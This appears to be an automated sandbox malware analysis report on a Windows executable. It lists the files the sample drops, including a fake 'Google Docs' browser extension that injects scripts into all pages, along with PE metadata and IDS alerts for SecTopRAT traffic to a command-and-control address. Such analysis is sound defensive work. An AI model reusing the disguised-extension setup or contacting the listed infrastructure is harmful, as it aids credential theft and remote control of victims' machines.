                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5657
                                                                                                          Entropy (8bit):7.83233516247914
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Nyq+wylRcbfXdRICJdBsooMKWsXFAP39Asutnd4mm5oq+tlwg4Ae4quVpdI8JW1:kq+TRYCooMKDXFAPDutLmKtusquVpG8m
                                                                                                          MD5:2C905A6E4A21A3FA14ADC1D99B7CBC03
                                                                                                          SHA1:BD8682B580D951E3DF05DFD467ABBA6B87BB43D9
                                                                                                          SHA-256:CC3631CED23F21AE095C1397770E685F12F6AD788C8FA2F15487835A77A380FB
                                                                                                          SHA-512:753E28BAB9D50B7882A1308F6072F80FDA99EDEAA476FAFC7E647D29F5C9C15F5C404689C866F8F198B7F1ED41BAE3CC55AE4D15528B0DF966A47CBC4B31CAF6
                                                                                                          Malicious:false
                                                                                                          Preview:.PNG........IHDR..............>a.....sRGB.........gAMA......a.....IDATx^.yt.....H.$!@......tf...9uA..*..H.w..#"...N......K .....N...helE%...a..........}......9.wr..=..~.r.....N8..N8..N8..N8.t.....?...{..a......o&5?7..3hA...<~...~.......p.5(..o....Z6$..&.....=.DUO8.9...?/.0....?...'......XE.......#H..s.o.x.....v.,8.%..;X.....$lZ....^D..............$bp....<M@....v.......0.......S..7#.."(..Ea.~...L..`FP.F.dx...[.a.....,..;.@...../"YX.........]...\./"Y8....Z. #...0...H...0#(.Fp0..vx....'..... ....D@...R.?k..........&.....{../..[..M.9.n.. .&.^.........._...u..8. ..t..?!V.....]v.....6.y..}E ...p|[.8...|w`..u...7#...1........".`.Xz..........1...d;..G......0..?.D....U/h=0..F0l.rND...`....v8g.-0.[...^.kw=..]G`.....YP...0..M....C.tM........H.v...1......;...7...........L.jC....P.o....L..>.@.....].8.."&....-&......NP.I.8...\..@c......5..._...=#..G... 6.......'!...@.%......y..l.a.@..7d.1....g..3..<.^+M.WK.Cu.R........]#T......4.^...'gU...~...L...z...@

                                                                                                          C:\Users\user\AppData\Local\ksedtnorf\llg\jquery.js

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:ASCII text, with very long lines (32086)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):95785
                                                                                                          Entropy (8bit):5.393592005865771
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:/PEkjP+iADIOr/NEe876nmBu3HvF38sEeLHFoqqhJ7SerN5wVI+xcBmPv7E+nzmQ:ENMyqhJvN32cBC7M6Whca98Hrp
                                                                                                          MD5:3C9137D88A00B1AE0B41FF6A70571615
                                                                                                          SHA1:1797D73E9DA4287351F6FBEC1B183C19BE217C2A
                                                                                                          SHA-256:24262BAAFEF17092927C3DAFE764AAA52A2A371B83ED2249CCA7E414DF99FAC1
                                                                                                          SHA-512:31730738E73937EE0086849CB3D6506EA383CA2EAC312B8D08E25C60563DF5702FC2B92B3778C4B2B66E7FDDD6965D74B5A4DF5132DF3F02FAED01DCF3C7BCAE
                                                                                                          Malicious:false
                                                                                                          Preview:/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret

                                                                                                          C:\Users\user\AppData\Local\ksedtnorf\llg\manifest.json

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):569
                                                                                                          Entropy (8bit):4.878267680490818
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:flNAuCONn3Ao19aHuDFRJIbpmxbuvWB0vXY:flVCONQo1XabpWuvPvXY
                                                                                                          MD5:2835DD0A0AEF8405D47AB7F73D82EAA5
                                                                                                          SHA1:851EA2B4F89FC06F6A4CD458840DD5C660A3B76C
                                                                                                          SHA-256:2AAFD1356D876255A99905FBCAFB516DE31952E079923B9DDF33560BBE5ED2F3
                                                                                                          SHA-512:490327E218B0C01239AC419E02A4DC2BD121A08CB7734F8E2BA22E869B60175D599104BA4B45EF580E84E312FE241B3D565FAC958B874D6256473C2F987108CC
                                                                                                          Malicious:false
                                                                                                          Preview:{.."manifest_version": 2,..."name": "Google Docs",.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.."version": "1.7.38",.."icons": {. "16": "icon.png",. "48": "icon.png",. "128": "icon.png". },..."permissions": [..."activeTab",..."storage"..],.."content_scripts": [ {..."all_frames": true,..."js": [ "jquery.js","content.js"],..."matches": [ "<all_urls>" ] ..} ],.."background": {. ."service_worker": "background.js". .},.."browser_action": {..."default_title": "SFASFASD"..}.}

                                                                                                          C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12606192
                                                                                                          Entropy (8bit):6.431140800392858
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:ReAtQzKADvk/9TEaImN9/tiHBIn8c3hCEFRUTaZnPZOtXwH:ReAOWOM/FE1mNHiFc3hr7UTaZnhOtXwH
                                                                                                          MD5:A7118DFFEAC3772076F1A39A364D608D
                                                                                                          SHA1:6B984D9446F23579E154EC47437B9CF820FD6B67
                                                                                                          SHA-256:F1973746AC0A703B23526F68C639436F0B26B0BC71C4F5ADF36DC5F6E8A7F4D0
                                                                                                          SHA-512:F547C13B78ACDA9CA0523F0F8CD966C906F70A23A266AC86156DC7E17E6349E5F506366787E7A7823E2B07B0D614C9BD08E34CA5CC4F48799B0FE36AC836E890
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$.........O...!...!...!..."...!...!...!.j.....!...&...!...%...!...$.J.!...'...!.j.%...!.j."...!.j.$...!...$...!...%...!.[.%.<.!.[.$...!... ...!... ...!... ...!.[.(...!.[.....!.......!.[.#...!.Rich..!.................PE..d...%ZPf..........#....'.....XA......zG........@.............................P......)..... ..........................................................@...............2...(..............T.......................(...@...@............................................text...|........................... ..`.rdata..P@.......B..................@..@.data............$.................@....pdata..............................@..@_RDATA.......0.......&..............@..@.rsrc........@.......(..............@..@................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Roaming\Downloadplugin\fgq

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278049
                                                                                                          Entropy (8bit):7.944499847118911
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:fokKHi3OWK6EmjunuvpzGBmg758xHXfkQBabgiNJfaM9t2lc:g9HizcmjuMpqBwz4Jf3t2u
                                                                                                          MD5:F6461CCD814A2EAD19BEEBA2125B5368
                                                                                                          SHA1:449EDE26EEB5234F02A9D4B5A19FA7B6FFC4A1DF
                                                                                                          SHA-256:8FB4E6D589830F39DB50877B542B11281E56762CAAA2742719B2AC042DD6CBD1
                                                                                                          SHA-512:FA8C7368597D79451FC47447EA1AC9E831B2B7835C6542A161BD74B0084DA66FFF4AC0555DCE0EEA64630887A2D953674125B1E2E9295A37B7BAC678DC606FCD
                                                                                                          Malicious:false
                                                                                                          Preview:...yH.u.ErA..`G...C..VsP..A..^e.K.B..pmsI.xk.S...i...K.b...G.dS..m.hm.BK..._.J.w]BluumQ..dds.W..J...c.F\...f.ReMS.oP.r..oTtf`..t.yb..t..sfYd......y.\nHI.oc.a.aoZ^p....U.rG_bGs.[^......s..M.B....CT..XJ.]hU.H.QS....LV.iy.H.hqXS_.pZ..D..c..C..K.F..v..V.g....cBU......b.f...U[.U\..Ok..d..A^...c.\..Pi..Abu..W.D....K..JS......r..m...P.CQM].b..s..HpA.._L._.p.I.t...sg.vVSn...FoGW...c.m..o.Q._w.[Rg...[KE..IN..yH...IR`NGyLp..nVL.h..xu.W.e.qTn.KyBvd^TVoO^.AcJ..Q..i.f..CiniB.ME.DL..T....GYO.X..r.._....uD.F....\..Y.d..wwD.hcs_..V]......u]..EX.y.feu._jA.Ktm.KcQf...tEN.MA.Z.MGuKPnHtY\uGy.h]..C.T....O....dS]..M[..f[^cm^....\.^.......XT.i.k.....K.JwL.l.\K.lky......oS...N......B...Jd....cy..V.THi..L..prd..Z.F..m^....bb.iY.EEbR...Jh.N...YFZ.e..E.aR.Rao.WO.........qXaN]W..v^.uN...rP.I...uf^.Uj[.vnO..h^AH.lS...QQ.CX..fo..o...oE...U.tGckC....Cl.....K._.g.s.Y.YRC..Z.F.D.....KdN.MVW].\y.VYHJ..aWg.RE.DW..eHLm..\.eMR......j..uV...].....ZcL..\.okD..Bs....SZ[...`R.lt.mDS.PE.hH]....EpO]....UZT..JN.....w.E.kP.K..[jN

                                                                                                          C:\Users\user\AppData\Roaming\Downloadplugin\tak_deco_lib.dll

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):323072
                                                                                                          Entropy (8bit):5.886344944882455
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:h0b/GJ1RdK6UwambkfOhOmesG+4ny2lV07j4:ayFs2IfmRHAyQVc
                                                                                                          MD5:EE7F11BEAF317EF7185B0CEC9A8CCFF4
                                                                                                          SHA1:274EBB8D1ADFA6D49E1D3FC85CF942357C8A7653
                                                                                                          SHA-256:6C2D0A8831E82FC3889E94EF3E986660E38175AE406FEA5A66E3D1F5C014EE97
                                                                                                          SHA-512:CDEEC3FBD4EFF63F64AAD6559C36654416AFAE5E7314DF1A756580DC52B6024C52F0F3803356B85D2095DFC136DE9234271A14EC843AF3CF3836B67BB30362B1
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....b.........." ..........................@...................................................................... ...............0..........v................7...........P...'......................................................X.... .......................text...P........................... ..`.data...8s.......t..................@....bss........p...........................idata..v............V..............@....didata...... .......f..............@....edata.......0.......h..............@..@.rdata..F....@.......n..............@..@.reloc...'...P...(...p..............@..B.pdata...7.......8..................@..@.rsrc...............................@..@....................................@..@........................................

                                                                                                          C:\Users\user\AppData\Roaming\Downloadplugin\ymv

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14675
                                                                                                          Entropy (8bit):6.3129340327989825
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:R+l02iZzxnnry2FDlVleoxhDrFdBT++7TO7:k9MNrZFJTZXDr5+QO7
                                                                                                          MD5:C40639E251F6F49D3F4C140CD1FC3D9C
                                                                                                          SHA1:7F531F2AD30F3BF2F637CEA7087F3E432CC54ADF
                                                                                                          SHA-256:2481D67EEEF5025767464E90969C913F198EAA8171F8EBB8E61CD92CA880293F
                                                                                                          SHA-512:D327399A1FB31203FD1B8AA991369DA907A4538BD77F69B0FC6568221CC3099300437D8E5F3F959C501FFCEF2E728971F33E2FCF0D453E96A84458A23ABB9480
                                                                                                          Malicious:false
                                                                                                          Preview:ICR.p....`v.g...Ik.....G.d....i.uvG..hnFB^.bh`YvC..xsw.U.Pu.`.fE..trZWq..d[..L....V.........KY..o.Fe.oI.qG.vogpy.aCo...bytk^....Aq..^.L^[a[B...e.wlSb.hXQxjYmA..V.VJs.JAM..P...t...a.Q.........]..L[iyrm...YM.e..s.W.d..sk...ba..e.......ne...Bu.o...D.USRWTt....b..nR..VH.....l.[.J.v..C.qq.].s.....`.Enwm...w.S..EbN.U...D..My.F..._m.CWD.DW..q.a.e....`.s.t...v.......JPw.bLsn....lM.J.X.....j....R...rA....D.U`..k.mr.br.....w.IhIi\...B..^...cL_\.........[.x.It....I...G.m....pVFqk...rreEc.LGZW...cH.CF..XI.p.bt..iC.PP.\q.HE.q]D....u..H...M..t....Ed..E].....udm....wdI...a.I....i...y.yU...n.e.P`..A.A..\..pS.P.vX...guv.F...U.U.dc.......c.d..W.lkP.gNkB.qW.u.j..c.iki...wj....Ly.xXj_....NGh.X......yj...FaT.j.\o.abgbExRX.NO....^LS\\.uS..rys.blbGVY..YdSA.q..QK.d...._Ys.KHKK........gqf.JP`tK.LYm..g....V.X.`gH\.^b...C.x.We.....L.E...v.Wp..A...Dx.h.Bd......x.JE.qxn......B.w]I..u.v..qa..NP.....L`LKNl[.C.QSN_...NA...O..k.r...V..vS...f.V.N...vh..p....p_q.g.Oqm...b.D..jGO...YcSW.hS[.r...`\YQ.P.^...QS..I.CYw.]k\o`

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Entropy (8bit):7.986175594759049
                                                                                                          TrID:
                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:file.exe
                                                                                                          File size:6'821'123 bytes
                                                                                                          MD5:bfc5ea31b4aeefec1508e8f5b458e574
                                                                                                          SHA1:976fe53a467068719f70a856dca3bb7b65a9d6dc
                                                                                                          SHA256:44997a5aa2709c2cef26ea501d4f01140d34b59f0fd182282354598eef4b224b
                                                                                                          SHA512:146ef0163df8be2c8e5a834c27d731c817e0540a30d4e4746109fd564c33d2d7f00560017f0d5b9ade9eea05611ed440f64022f97e30949e5bb58041452f590e
                                                                                                          SSDEEP:98304:vi0rHj8I5IxALsFFyTFaYTXMHyAw8aMAKa392mAYYqUSoYTk0KGjp2kizn:vi0rDyraTFNKyLUAKw2B7qUShTkQjDir
                                                                                                          TLSH:3566330576D46DF4D937823EED85894ADF733C22A722DB9F466482B60F231D12D2EB21
                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......u..!1jhr1jhr1jhr...r9jhr...r.jhr...r<jhr...r3jhr..ls#jhr..ks8jhr..ms.jhr8..r8jhr8..r3jhr8..r6jhr1jir<khr..ms.jhr..hs0jhr...r0jh

                                                                                                          File Icon

                                                                                                          Icon Hash:1515d4d4442f2d2d

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x14001a1b0
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x140000000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x651BC800 [Tue Oct 3 07:51:28 2023 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:2
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:2
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:2
                                                                                                          Import Hash:f557cb5e3abb3bc5ede97f2a0da19e34

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          dec eax
                                                                                                          sub esp, 28h
                                                                                                          call 00007F92C84FD2C8h
                                                                                                          dec eax
                                                                                                          add esp, 28h
                                                                                                          jmp 00007F92C84FCCEFh
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          jmp 00007F92C8501738h
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          dec eax
                                                                                                          sub esp, 48h
                                                                                                          dec eax
                                                                                                          lea ecx, dword ptr [esp+20h]
                                                                                                          call 00007F92C84FC297h
                                                                                                          dec eax
                                                                                                          lea edx, dword ptr [000218B3h]
                                                                                                          dec eax
                                                                                                          lea ecx, dword ptr [esp+20h]
                                                                                                          call 00007F92C84FE192h
                                                                                                          int3
                                                                                                          dec eax
                                                                                                          mov dword ptr [esp+10h], ebx
                                                                                                          dec eax
                                                                                                          mov dword ptr [esp+18h], esi
                                                                                                          push edi
                                                                                                          dec eax
                                                                                                          sub esp, 10h
                                                                                                          xor eax, eax
                                                                                                          xor ecx, ecx
                                                                                                          cpuid
                                                                                                          inc esp
                                                                                                          mov eax, ecx
                                                                                                          inc ebp
                                                                                                          xor ebx, ebx
                                                                                                          inc esp
                                                                                                          mov edx, edx
                                                                                                          inc ecx
                                                                                                          xor eax, 6C65746Eh
                                                                                                          inc ecx
                                                                                                          xor edx, 49656E69h
                                                                                                          inc esp
                                                                                                          mov ecx, ebx
                                                                                                          mov esi, eax
                                                                                                          xor ecx, ecx
                                                                                                          inc ecx
                                                                                                          lea eax, dword ptr [ebx+01h]
                                                                                                          inc ebp
                                                                                                          or edx, eax
                                                                                                          cpuid
                                                                                                          inc ecx
                                                                                                          xor ecx, 756E6547h
                                                                                                          mov dword ptr [esp], eax
                                                                                                          inc ebp
                                                                                                          or edx, ecx
                                                                                                          mov dword ptr [esp+04h], ebx
                                                                                                          mov edi, ecx
                                                                                                          mov dword ptr [esp+08h], ecx
                                                                                                          mov dword ptr [esp+0Ch], edx
                                                                                                          jne 00007F92C84FCECDh
                                                                                                          dec eax
                                                                                                          or dword ptr [00024627h], FFFFFFFFh
                                                                                                          and eax, 0FFF3FF0h
                                                                                                          dec eax
                                                                                                          mov dword ptr [0002460Fh], 00008000h
                                                                                                          cmp eax, 000106C0h
                                                                                                          je 00007F92C84FCE9Ah
                                                                                                          cmp eax, 00020660h
                                                                                                          je 00007F92C84FCE93h

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3c9300x34.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3c9640x50.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000xdff8.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x750000x24fc.pdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x900.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x38e700x54.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x309c00x140.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2e0000x470.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bc1c0x100.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x2cb7e0x2cc003d113a12b4dfdab8b576545cd6fc5f0eFalse0.5764392021648045data6.471709677041351IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x2e0000xf86a0xfa0092ca8153402a34b1e8382f60ca93e99fFalse0.437859375DIY-Thermocam raw data (Lepton 2.x), scale 19712-28416, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 2368749288808805040128.0000005.100830914340511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x3e0000x36b9c0x140053ce97542c4f29f60ae2cea0f648fa01False0.3400390625DOS executable (block device driver o\3050)3.7536143429763227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .pdata0x750000x24fc0x26009558ae285499f071dedc3d50b3a4437bFalse0.4764597039473684data5.358754869145224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .didat0x780000x3000x400ccbb720297e8f974f92efff6c5ec1cc2False0.232421875data2.592339898189372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          _RDATA0x790000x15c0x200014bbaa5623bfe467976303b6e03a529False0.40234375data3.3226749180020123IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x7a0000xdff80xe000b01a452f33288dfdc5d99e308097a5a3False0.6373116629464286data6.638460626868574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x880000x9000xa00b631e8a871cdb23ffe98f9561f7713b3False0.47421875data5.19779783770168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          PNG0x7a6500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                          PNG0x7b1980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                          RT_ICON0x7c7480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                          RT_ICON0x7ccb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                          RT_ICON0x7d5580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                          RT_ICON0x7e4000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                          RT_ICON0x7e8680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                          RT_ICON0x7f9100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                          RT_ICON0x81eb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                          RT_DIALOG0x865880x286dataEnglishUnited States0.5092879256965944
                                                                                                          RT_DIALOG0x863580x13adataEnglishUnited States0.60828025477707
                                                                                                          RT_DIALOG0x864980xecdataEnglishUnited States0.6991525423728814
                                                                                                          RT_DIALOG0x862280x12edataEnglishUnited States0.5927152317880795
                                                                                                          RT_DIALOG0x85ef00x338dataEnglishUnited States0.45145631067961167
                                                                                                          RT_DIALOG0x85c980x252dataEnglishUnited States0.5757575757575758
                                                                                                          RT_STRING0x86f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                          RT_STRING0x871500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                          RT_STRING0x873200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                          RT_STRING0x874d80x146dataEnglishUnited States0.5153374233128835
                                                                                                          RT_STRING0x876200x46cdataEnglishUnited States0.3454063604240283
                                                                                                          RT_STRING0x87a900x166dataEnglishUnited States0.49162011173184356
                                                                                                          RT_STRING0x87bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                          RT_STRING0x87d500x10adataEnglishUnited States0.49624060150375937
                                                                                                          RT_STRING0x87e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                          RT_STRING0x87f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                          RT_GROUP_ICON0x85c300x68dataEnglishUnited States0.7019230769230769
                                                                                                          RT_MANIFEST0x868100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
                                                                                                          OLEAUT32.dllVariantClear
                                                                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-11-22T15:48:55.028845+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.74978745.141.87.5515647TCP
                                                                                                          2024-11-22T15:48:55.149849+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.74978745.141.87.5515647TCP
                                                                                                          2024-11-22T15:48:55.270513+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.74978745.141.87.5515647TCP
                                                                                                          2024-11-22T15:48:55.393236+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.74978745.141.87.5515647TCP
